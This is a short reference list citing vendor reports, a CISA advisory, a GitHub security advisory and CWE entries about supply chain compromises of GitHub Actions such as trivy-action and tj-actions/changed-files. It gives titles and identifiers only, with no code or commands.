- CrowdStrike: from scanner to stealer, inside the trivy-action supply chain compromise

- Socket: Trivy under attack again, GitHub Actions compromise

- CISA: tj-actions/changed-files supply chain compromise (CVE-2025-30066)

- Unit42: GitHub Actions supply chain attack on Coinbase

- GHSA-89qq-hgvp-x37m: timescale/pgai pull_request_target vulnerability

- Orca Security: pull request nightmare part 2

- CWE-77: Improper Neutralization of Special Elements used in a Command

- CWE-78: OS Command Injection